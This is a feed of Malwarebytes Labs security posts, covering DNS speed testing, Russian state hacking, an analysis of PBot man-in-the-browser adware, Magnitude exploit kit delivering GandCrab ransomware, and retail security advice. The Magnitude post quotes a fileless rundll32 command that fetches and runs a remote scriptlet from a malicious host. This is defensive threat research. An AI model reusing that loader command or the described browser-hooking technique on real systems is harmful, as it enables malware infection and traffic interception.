It does help to set “Your location,” but my laptop travels a lot, so I skipped that. Then “Start Benchmark” and be patient for a while, because it may take a few before the application is done testing (it took almost half an hour on my laptop). The results will have a layout similar to this one:

While your results may be very different from mine, you can tell that it can definitely pay off to do this test if you are looking for a speed improvement.

So, a speed improvement of 13.5 % and a promise of added privacy. What am I going to do? Well, at least I’ll try it for a while to see if it makes a real difference. And note that I already was using an alternative for the DNS service of my provider, which was terrible, to begin with.


For most internet users it is worth looking into which DNS service works best for them. Be it for speed improvement or some of the added benefits that some of these DNS services have to offer, like additional privacy or parental controls. But most will keep on using the ones provided by their ISP provider because they just can’t be bothered or find it too complicated to change the settings. We do our best to encourage our readers to make informed choices and decide for themselves who they want to trust with the data that can be derived from DNS lookups.

Be safe!

The post Cloudflare’s new DNS service appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Perspectives on Russian hacking

Malwarebytes - Thu, 04/19/2018 - 16:42

Russia is an endlessly fascinating subject both in and around infosec. Recent years have shifted attention away from pure malware capabilities, to psyops, social engineering, and an endless slew of mind games designed to destabilize and keep nations ever-so-slightly off balance.

Security firms in some countries claim Russia would “win” in a so-called cyber war; elsewhere, whole nations seemingly throw up their hands and admit defeat, while…helpfully?…suggesting potential targets of interest. One hopes those are false flags diverting attention from the juicier strike points, but when even the Russian experts themselves seem to slip up in spectacular fashion, it seems anything is possible.

In fact, the US and UK have just released a joint statement which highlights Russian hacking (state-sponsored attacks) on network infrastructure devices over the last three years. With hack attacks bubbling under the surface, and endless concerns present about everything from referendum tampering to election interference, the subject has never been more prominent.

SCMagazine recently talked to a number of people working in security fields, myself included, on this very subject. While many areas of concern were raised, the main takeaways are as follows:

Bots and social media

The social media landscape has been irrevocably changed, in terms of what a nation state can potentially achieve with a troll/bot farm. “You’re a Russian bot” on Twitter has almost become the de-facto explanation for anyone you might happen to disagree with. Indeed, Russian shenanigans on said platform are so prolific that Twitter had to start sending out “So you dealt with a bot” style messages in January.

How many? Roughly 1.4 million notifications for anyone found to have interacted with the IRA (Internet Research Agency) during the 2016 US election. This includes:

  • People who directly engaged during the election period with the 3,814 IRA-linked accounts were identified, either by retweeting, quoting, replying to, mentioning, or liking those accounts or content created by those accounts
  • People who were actively following one of the identified IRA-linked accounts at the time those accounts were suspended
  • People who opt out of receiving most email updates from Twitter and would not have received our initial notice based on their email settings.

I never received a message myself, so either my Opsec game is on point or I spend too much time tweeting about chocolate.

There is an ongoing investigation into how many Russian bots dabbled in the UK’s EU referendum, also from the same year. Social media is an amazingly powerful platform for disinformation, and more often than not corrections either never take place or gain far fewer eyeballs than the original mistruth.

Who, what, when…you know what, just stop the attack

With the rise of APT attacks (“advanced persistent threats”), there has been huge focus on which nation state is doing what terrible and sneaky thing online. This is the case even when APTs typically turn out to be not very advanced at all—infected spreadsheet or basic phishing email, anyone?

All the same, being able to track down an attack and trace it back to country x is a huge headline grabber. The problem is that in many cases, the best you can do is make an informed guess.

Pin the tail on the nation state donkey was a big deal at one time; the focus is now slowly shifting to something people can actually do something about. Namely, not so much “who did this” but “how did they get in, and how can we stop it happening next time?” There’s no shame in being bested by an actual government with unlimited resources, and it’s definitely time to consider how we can make ourselves as unappealing a target as possible.

Holding you to ransom

Ransomware is one of the mainstays of Russian malware development, with numerous high profile attacks over the last few years. It’s interesting to wonder if the downturn in ransomware fortunes over the past year has had an impact on said development. It’s also interesting to wonder how much Russia may be contributing to the upturn in business-centric spyware recently.

Information may want to be free, but a little data exfiltration never hurt anybody (from a nation state’s perspective doing the exfiltration, at any rate). It’s a double whammy of locked up machines and harvested sensitive documents, and it’s all to play for.

Money makes the computer world go round

Governments around the world are now throwing big bucks at these issues. The UK previously dedicated £1.9 billion over five years to tackling the problem, and recently jumped into the world’s largest “cyber declaration”, a pact between up to 53 nations designed to help shore up defences globally. Expect to see tight bonds forged moving forward.

Whatever your approach, whatever your budget, whatever your defensive tactics, there’s never been a better time to consider if you’re doing all you can to try and dodge a digital attack from the highest level. Meanwhile, whether through organised malware attacks, high level subterfuge, or a relentless wave of social media botting, the digital monolith that is Russia continues to dance to nobody’s tune but its own.

The post Perspectives on Russian hacking appeared first on Malwarebytes Labs.

Categories: Techie Feeds

PBot: a Python-based adware

Malwarebytes - Wed, 04/18/2018 - 15:00

Recently, we came across a Python-based sample dropped by an exploit kit. Although it arrives under the disguise of a MinerBlocker, it has nothing in common with miners. In fact, it seems to be PBot/PythonBot: a Python-based adware.

Apart from a couple of posts on forums in Russian language and brief threat notes, we couldn’t find any detailed publication.

Some of its features are pretty interesting, so we decided to take a closer look. The malware performs MITB (man-in-the-browser) attacks and injects various scripts into legitimate websites. Its capabilities may go beyond simple injections of ads, depending on the intentions of its distributors.

Analyzed samples Distribution method

The described sample was dropped by the RIG exploit kit:

Behavioral analysis Installation

The main executable, dropped by the exploit kit, is a downloader. The downloader is pretty simple and not obfuscated. We can see the scripts in the resources:

Its role is to fetch the second installer that has all the malicious Python scripts inside. The second component is named MinerBlocker.

The interesting thing is, if the downloaded component is run as a standalone, it behaves like a normal, legitimate installer, displaying a EULA and installation wizard. We can see the following information:

It pretends to be a legitimate application dedicated to blocking malicious miners. However, we could not find any website corresponding to the mentioned product, so at the moment we suspect that it is fully made up.

When the same component is run by the original downloader, the installation is fully stealthy instead. It drops the package in %APPDATA%.


The dropped application consists of multiple elements. We can see a full installation of Python prepared in order to run the dropped scripts. The bundle has also its own uninstaller (uninstall.exe) that, once deployed, fully removes the package.

In the directory js, as the name suggests, we can find a file with JavaScript, i.js:

In configs, there are two configuration files: rules.ini and settings.ini.

The configuration file rules.ini specifies the path to the JavaScript and suggests that it will be injected somewhere:

.gist table { margin-bottom: 0; }

The file settings.ini contains various interesting parameters. It contains, among others:

1) The ports on which the service will be running, and the issuer of the used certificate:

2) A list of processes (browsers) that will possibly be attacked:

3) A set of whitelisted IPs and domains. The domains are in Base64 format and, after decoding them, we can see various Russian banking sites. The full list of the decoded sites is available here. As we later confirmed, those sites are exempted from the infection.

Persistence is achieved by Run keys in the registry:

They lead to one of the scripts called “” Once this script is run, it deploys another Python component: “” with the dropped .ini files:


If we look at the packaging, which contains an uninstaller, the application could look legitimate. However, its functionality is far form something that any user would desire to have on his/her computer. First of all, it injects scripts into each website you visit. The injected script comes from the path specified in the configuration, however, it further loads a second stage from the remote server (captured content of the second stage available here).

So, once it is injected, the attackers are in control of the contents displayed in our browser. They can inject ads, but also any other much more malicious content.

Example of a site with the script injected by the malware that impersonates a domain belonging to Google:

Compare it with the script that was in the directory js, i.js (formatted version available here):

Also, the malware forges certificates and performs the man-in-the-browser attack. The legitimate certificates on the sites with HTTPS are replaced by fake certificates issued by “The Filter” that is a malicious entity:

Looking at the sockets opened by a browser (i.e. by ProcessExplorer) and comparing them with the sockets opened by the Python instance, we find that they are paired together. It is an indicator that the browser communicates with the malware and works under its control.

Example: Internet Explorer connected to a socket 24681. We can see that this socket was opened by the Python process running the malware:

Inside The loader (written in Python)

The first layer of the malware is the obfuscated Python scripts.

As mentioned before, at the beginning, the script is run. This script is obfuscated. Its role is to run the second Python layer that is

The script is supposed to decrypt a DLL stored in the file httpfilter.bin.

Then, it injects the DLL into the Python executable. For the purpose of injection, it uses imported system DLLs, ctypes, and custom definition of PE headers.

Fragment of the PE headers definitions:

It manually loads the PE file (remaps sections to virtual format, applies relocations and loads imports). Beginning of the loader:

After loading is completed. it redirects the execution to the entry point.

You can find the full deobfuscated loader here.

It is interesting because PE injectors written in Python are not so common.

The injector (DLL)

The DLL injected in Python (e5ba5f821da68331b875671b4b946b56) is the main component of the malware. This component expects to be injected into Python executable:

It also fetches the passed parameters (settings.ini and rules.ini). So we can see that they were not meant to be parsed by the script to which they were previously passed.

The authors left some debug strings that makes the execution flow easy to follow. For example:

This DLL is responsible for parsing the configuration and setting up the malicious proxy.

It comes with two hardcoded DLLs: one 32-bit and one 64-bit (both stored in overlay of the PE file and not obfuscated). Those DLLs are the components that are further injected into browsers that are selected by the configuration. Their names are appropriately: injectee-x86.dll and injectee-x64.dll:

The injectee (DLL)

The execution of injectee DLL starts in the exported function, InjectorEntry:

The injectee is implanted in a browser and responsible for hooking its DLLs. Here’s the beginning of the hooking function:

The hooking function is pretty standard for this type of event. It retrieves the addresses of the specified exported functions, then it overwrites the beginning of each function redirecting it to the corresponding function within the malicious DLL.

The targets are functions responsible for parsing certificates (in Crypt32.dll), as well as functions responsible for sending and receiving data (in ws32_dll):

When we dump the hooks via PE-sieve, we can directly see how those functions have been redirected to the malware. Here is the list of tags gathered from the appropriate DLLs:

From Crypt32:

16ccf;CertGetCertificateChain->510b0;5 1cae2;CertVerifyCertificateChainPolicy->513d0;5 1e22b;CertFreeCertificateChain->51380;5

From ws32_dll:

3918;closesocket->50c80;5 4406;WSASend->50d90;5 6b0e;recv->50ea0;5 6bdd;connect->50780;5 6f01;send->50c90;5 7089;WSARecv->50fa0;5 cc3f;WSAConnect->50ab0;5 1bfdd;WSAConnectByList->50c70;5 1c52f;WSAConnectByNameW->50c50;5 1c8b6;WSAConnectByNameA->50c60;5

In both cases, we can see that the addresses have been redirected to the injectee DLL that was loaded at the base 50000.

So, for example, the function WSASend gets intercepted and the execution is redirected to a function at RVA 0xd90 in the injectee dll:

The beginning of the intercepting function:

By this way, all the requests are redirected to the malware. It can work as a proxy, altering data on the way.

After the proxy function finishes, it jumps back to the original function, so the user doesn’t realize any change in the functionality.


This malware is pretty simple, does not contain much obfuscation and was probably not intended to be stealthy. Rather than hiding, it tries to look harmless and legitimate. However, the functionality that it delivers is powerful enough to cause serious harm. It may be configured to display harmless ads, but it could also be configured to modify the website’s content in any other way. For example, displaying phishing pop-ups, such as it was implemented in Kronos. Also, the fact that it forges certificates of the sites should raise concerns.

The post PBot: a Python-based adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Magnitude exploit kit switches to GandCrab ransomware

Malwarebytes - Tue, 04/17/2018 - 16:58

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. The variations of this technique have been known for several years and used by other families such as by Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.

"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication "; document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL


The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

5 cybersecurity questions retailers must ask to protect their businesses

Malwarebytes - Tue, 04/17/2018 - 15:00

The Target breach in 2013 may not be the biggest retail breach in history, but for many retailers, it was their watershed moment.

Point-of-sale (PoS) terminals were compromised for more than two weeks. 40 million card details and 70 million records of personal information swiped—part of which was “backlist,” historical transaction information dating back to more or less a decade ago. Card unions paid over $200 million in cost for card reissues. They then filed a class-action lawsuit against Target to regain this cost.

And the most mind-blowing fact of all? Target actually had (and still does have) cybersecurity measures in place and a security policy for employees to follow. How and why the breach even happened the way it happened remained the subject of discussion for a long time, and hard lessons were learned.

The good news for retailers is that it doesn’t (always) have to be this way.

Pose the right questions

Retailers of all shapes and sizes care about their businesses and clients. No merchant would want to be in the shoes of Target or TJX for a minute, post-breach. In fact, if they can keep something as big and messy and costly from happening to them, they would do anything.

It’s understandably challenging to add more to an already tall order of “things to do” in the retail industry; however, cybersecurity should no longer be seen as an afterthought, nor should it be treated like an option that one can get hyped up about today and then forget tomorrow. It has quickly become an integral part of any organization for the sake of business continuity, client retention, and brand integrity.

If you remain unconvinced whether you really need to incorporate cybersecurity in your business, perhaps this is a thought you can consider: If your organization uses any form of technology that connects to a data communication avenue and/or the Internet, chances are you need cybersecurity.

“Where do I start?” is probably not the right question to ask once you decide to kick off this journey, for you’ll most certainly receive an “I don’t know” or “I have no idea” just as instantly. Instead, be specific and practical. Come up with questions that you think you can answer. We have listed some below that you can use to guide you on your way.

What am I using in business that needs protecting?

Here, you can list down your valuable assets, beginning with the tangible (the retail store, CCTV cameras, mobile phones, point-of-sale machines, etc.) and then the intangible (your website, customer data, intellectual property, etc.). Once done, you can then find out ways to secure them individually according to your business’s needs. Most of the time, all you need to do is to configure your devices and peripherals to make the most use of security-related settings.

For example, installing smart CCTV cameras on-premise can both lessen the risk of physical theft and aid law enforcement in capturing criminals should something terrible happen in the shop. But who is watching your watcher? Better yet: Who else could be watching through your watcher? A lot of CCTV cameras can be accessed publicly via the Internet. You can secure these cameras and ensure that you and your staff are the only ones who can use them by setting them up to local-only mode and changing their admin names and passwords.

You may also decide to seek help from your service provider with more complicated devices and systems.

Read: Why you don’t need 27 different passwords

Should you wish to invest in software or tools, pick those that protect as many of your assets as possible. For example, many endpoint security solutions allow users to install it on multiple devices running on Windows.

What are the threats that can potentially affect my business?

Cybersecurity threats to retail businesses can come in the form of people or technology. We’re quite familiar with the former: from the petty thief to an organized crime group. There are also malicious insiders and basically anyone meaning to make money out of your business.

On the other hand, one thing merchants miss when identifying what could potentially introduce threats to their companies are the very technology (apps, modern payment systems, and others) they use or invest in to remain competitive. The dangers or risks introduced by these are usually accidental, and can be avoided entirely.

Customer data remains the primary target of fraud in the retail industry. For those who may not be in the know, one customer data may contain their credit or debit card details, spending patterns or habits, and loyalty behaviors, which can be retrieved from online shopping, digital marketing, and loyalty schemes they’re enrolled in.

Other threats retailers must keep in mind that they must defend themselves against malicious insiders, spear phishing, DDoS attacks, brute force attacks, reconnaissance and suspicious activity attacks, supply chain attacks, and more. If you’re a merchant that uses the omni-channel approach, be aware that there is now a new type of fraud in this environment. We’ll tackle this in depth in a future post.

How can I keep cybersecurity threats away from my business?

Merchants have gotten really good at handling traditional risks and threats to their businesses. But managing potential physical risks, which is fantastic, is one thing, and managing digital risks is another. For new and old merchants alike, thankfully they don’t have to start from scratch. There are already industry standards in place, such as the Payment Card Industry Security Council’s Data Security Standard (PCI DSS), that they can readily glean from. The Object Management Group (OMG), an international technology standards consortium, also has a cybersecurity standard that merchants may want to look into as well. And, oh, if you have clients in the UK and EU countries, let’s not forget GDPR.

As for other cybersecurity threats that need addressing, such as those that affect a merchant’s website, our Labs blog has a lot of great resources:

The National Federation of Retail Newsagents (NFRN), an organization composed of thousands of independent retailers in the UK and Northern Ireland, published a booklet that also serves as a checklist for merchants regarding assessing retail crime risk. This list includes physical security and cybersecurity.

Lastly, merchants must decide on a regular time to conduct a risk assessment—monthly, quarterly, biannually, or annually.

Should my employees get involved in mitigating cybersecurity risks?

Absolutely. When it comes to implementing good security practices in a retail business, merchants cannot do it alone. One way they can start employees off is by creating a culture of cybersecurity at the very beginning. Merchants can even incorporate awareness and basic cybersecurity concepts in their training process for new hires. Get them up to speed with the kinds of digital threats the business may come face-to-face with at some point in the future and provide them the steps on how to respond efficiently to red alert cases.

Read: How to create an intentional culture of cybersecurity

Note that training must be done on a regular basis and not just a one-off occurrence. It must also be relevant, practical, and engaging to employees. Use familiar case studies like the Target breach, or if your organization has experienced a form of cyberattack in the past, use that as a teaching moment, too.

What else can I do once I’ve secured the business’s assets?

Once you’ve done a great deal of securing, realize that the job doesn’t end there. There are still some things that need to be done:

  • Monitor your PCI environment on a regular basis. Doing so will notify you in real-time of potential intrusions in your payment system so you can nip the thread in the bud before the circumstance escalate.
  • Schedule a regular audit of security and compliance. This will ensure that your retail business remains in compliance with security and industry standards.
  • Join a community. Information sharing among fellow merchants is becoming a trend when it comes to cybersecurity. Firms learn from each other’s victories and mistakes. After all, cybercrime is not just a problem of one but of every organization in the industry. Cybersecurity, in this regard, is now a community effort.
  • Keep learning. Staying on top of the latest security news and industry challenges can help merchants familiarize themselves with tactics threat actors are using against retailers, assess their current situation, and make adjustments to their defenses and protocols accordingly.
  • Prioritize security and privacy when creating apps. Make sure that should you choose to develop software, such as apps, that you encourage your clients to install, make sure that you have security in mind in making these apps.
  • Create a security policy. This makes good computing practices not just feel like guidelines but actual procedures employees need to adhere to. Here are sample templates merchants can use as and tweak to their preference.
Stop chasing the wrong answers

Breaches are inevitable. This is a known fact and an often-repeated line by people in the cybersecurity industry. Companies have been advised to prepare.

That said, perhaps a merchant’s next and final question would be this: If a breach is inevitable, then what’s the point of doing all this?

It’s true that no one wants to invest a lot of time and money in security tools, services, and people to fight off breaches only to be told it’s not possible. The message they’re hearing is “the bad guys always win, and there’s nothing you can do about it.” However, this isn’t in-line with reality at all.

While there’s no such thing as perfect security, the protocols a multitude of companies have in place already helped them stop many breach attempts.

Unfortunately, sometimes threat actors do succeed in infiltrating a retailer’s network. In this case, the logical action is to contain it to prevent it from escalating and causing more damage. But containment and preventative steps cannot be done if proper security measures, guidelines, and a good security architecture aren’t in place, to begin with. Also, identifying what made it successful so the organization can make changes is part of the overall cybersecurity strategy. So putting them there isn’t really for naught.

The post 5 cybersecurity questions retailers must ask to protect their businesses appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds